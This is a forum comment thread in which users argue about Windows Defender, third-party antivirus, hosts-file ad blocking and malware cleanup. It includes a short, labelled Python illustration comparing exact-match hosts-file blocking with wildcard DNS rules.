    Prevention = best medicine (& what can't touch you can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

    Ads & malware rob speed, security & privacy

    Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

    Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

    * Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

    APK

    P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

  84. Re:MicroShaft by Applehu+Akbar · · Score: 2

    Nice Fanboi flamebait post. Beau, did MicroShaft PAY you to put this up?

    I can back this up based on my end-user servicing experience, and I'm not even a Microsoft fan. Recent versions of Windows before 10 are better protected with Microsoft Security Essentials (free from MS) plus periodic manual scans with MalwareBytes Free than the bloated antivirus scanners that bog down PCs for the first hour after every reboot. In Windows 10, the antivirus is finally built in once again, so long as you enable Windows Defender.

  85. You cannot disable Defender by Anonymous Coward · · Score: 0

    Perhaps the conclusion stems not from any misbehavior on the part of the third-party AV, but from Defender's absolute insistence on starting its service and making itself unkillable even though its real-time protection is turned off (whether by the user or the presence of a third-party AV).

    All the faults being attributed to having a third-party AV running might actually be because Defender continues running in a half-active mode that isn't properly tested.

    Correlation is not causation.

  86. Re:Disable ad-blocker for a paragraph of twitter c by Darinbob · · Score: 1

    You can do the wild cards with a router based DNS server. Though this is not as easy and turnkey as an adblocker.
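The exact-match limitation of a hosts file versus the wildcard rules a router-based DNS server can apply, as an added illustration that is not part of the thread or any poster's code. The hosts content and the "*.zone" rule syntax are constructed for this example; real DNS servers each have their own rule format.

```python
# Added illustration: exact-match hosts-file blocking vs. wildcard DNS blocking.
# Sample hosts content and wildcard rules are constructed for this example; the
# "*.zone" rule syntax stands in for whatever a router's DNS server accepts.
from typing import Dict, List, Tuple

HOSTS_SAMPLE = """\
# a comment line
127.0.0.1   localhost
0.0.0.0     ads.example.test tracker.example.test   # two names, one line
0.0.0.0     cdn.ads.example.test
"""

WILDCARD_RULES = ["*.example.test"]

SINKHOLES = {"0.0.0.0", "::"}  # addresses conventionally used to sinkhole a name


def parse_hosts(text: str) -> Dict[str, str]:
    """Return {hostname: address} for every mapping in hosts-file text."""
    table: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            table[name.lower()] = addr
    return table


def hosts_blocks(table: Dict[str, str], host: str) -> bool:
    """A hosts entry matches one exact name; subdomains are not covered."""
    return table.get(host.lower().rstrip(".")) in SINKHOLES


def wildcard_blocks(rules: List[str], host: str) -> bool:
    """'*.zone' covers the zone and every name under it; plain rules are exact."""
    host = host.lower().rstrip(".")
    for rule in rules:
        rule = rule.lower()
        if rule.startswith("*."):
            zone = rule[2:]
            if host == zone or host.endswith("." + zone):
                return True
        elif host == rule:
            return True
    return False


def compare(hosts_text: str, rules: List[str], host: str) -> Tuple[bool, bool]:
    """(blocked by hosts file, blocked by wildcard DNS) for one lookup."""
    return hosts_blocks(parse_hosts(hosts_text), host), wildcard_blocks(rules, host)


if __name__ == "__main__":
    for h in ("ads.example.test", "cdn.ads.example.test", "new.example.test"):
        blocked_hosts, blocked_dns = compare(HOSTS_SAMPLE, WILDCARD_RULES, h)
        print(f"{h:22} hosts={blocked_hosts} wildcard-dns={blocked_dns}")
```

A name that appears after the hosts file was written (new.example.test here) slips past the hosts file but is still caught by the zone rule, which is the gap the post above is pointing at.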

  87. Not MS solution by Anonymous Coward · · Score: 0

    I've never had MS find a live virus, but have had 3rd party find plenty on a computer, live or otherwise.

  88. Read Parent As... by Anonymous Coward · · Score: 0

    Defender works well but I hate Microsoft so Nyah Nyah Nyaaahhhhh!!!

  89. Linux+ClamAV scans.... by Anonymous Coward · · Score: 0

    I was able to clean up Windows systems back in the mid '00s completely inundated with viruses thanks to ClamAV. This was before the polymorphic installer packages started to become popular.

    But between clamav to scan and remove the viruses/malware/etc, and a registry cleaner to ensure no automated downloads/reinfections once rebooted and connected to the internet, everything worked fine almost every time.

    That said: these were non-trivial scans and repairs. The scan itself often took upwards of 12-24 hours, followed by finding/installing replacements for corrupt/replaced DLLs and EXEs, and then the final registry scan. Off straight hourly billing I didn't make MY time back as money, and if I had been billing hours worked it often would have cost far more than the computer was worth. But it got me valuable experience and saved a few people's irreplaceable data.

    Nowadays with file encrypting ransomware, I wouldn't bother, but back then when most malware/viruses were limited in scope it was an easy but sometimes time consuming process to recover while leaving everything important intact.

  90. Re: MicroShaft by brewthatistrue · · Score: 1

    > Other AV products have always been monstrously bloated affairs, and have become all the worse over the last decade

    Additionally, even decent antivirus tends to bloat over time.

    Avira Antivirus and MalwareBytes Anti-Malware both have "web protection" modules that will not stop nagging you if you disable them, for example.

  91. SecureAplus has been a lifesaver for me by perlface · · Score: 1

    SecureAplus has white-listing as well as anti-virus.

    My wife's computer and my daughter's computer were always becoming malware infested. Since using SecureAPlus with the whitelist restriction turned on we haven't had any problems. Now whenever a non-whitelisted program tries to run, they full-stop until I check it out. Plus the AV allegedly runs using multiple AV engines in The Cloud.

  92. Windows = Malware by Anonymous Coward · · Score: 0

    Too bad their entire OS is malware. Plus, they've taken Apple's stance of giving consumers the middle finger. Fuck you Microsoft.

  93. Re: MicroShaft by Anonymous Coward · · Score: 0

    We wouldn't need AV on MS OS's if not for the fact that the OS is just plainly stupid.

    Cortana! Why does Windows allow malicious code to run?

  94. Re: MicroShaft by godefroi · · Score: 1

    What about Windows' firewall makes it unreasonable? Honestly curious here.

    --
    Karma: Poor (Mostly affected by lame karma-joke sigs)
  95. Re:Disable ad-blocker for a paragraph of twitter c by david_thornley · · Score: 1

    When my wife went to the New York Times website and was infected by an ad, I decided ad blockers were a really good idea.

    --
    "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  96. Microsoft managers lack the simplest insight? by Futurepower(R) · · Score: 1

    Exactly.

    How does it happen that a huge organization lacks the simplest insight?

  97. Re: MicroShaft by Darinbob · · Score: 1

    Well, last I looked it was pretty lacking. Maybe they've improved it over time?

  98. Yeah, right. by Anonymous Coward · · Score: 0

    And these folks are designing our browsers... What are they snorting?
    Don't ever even try to tell me that anything for AV from MS is any good. It'll never happen.
    Just look at the years they've had perfecting OSes........... 'nuf said.

    Just this afternoon (browsing with Chrome) I was fighting a 'drive by' ad-injected POS malware.
    Avast caught it. Adblocker running and it still was loading. I was scratching my head, then I just blocked the URL at the router.
    If only they could design a browser that could filter properly.

  99. Re: MicroShaft by godefroi · · Score: 1

    Lacking what?

    --
    Karma: Poor (Mostly affected by lame karma-joke sigs)
  100. Re: MicroShaft by Coren22 · · Score: 1

    You mean just like every other OS?

    I don't recall any OS that was immune to malicious code, can you point me to one?

    --
    APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?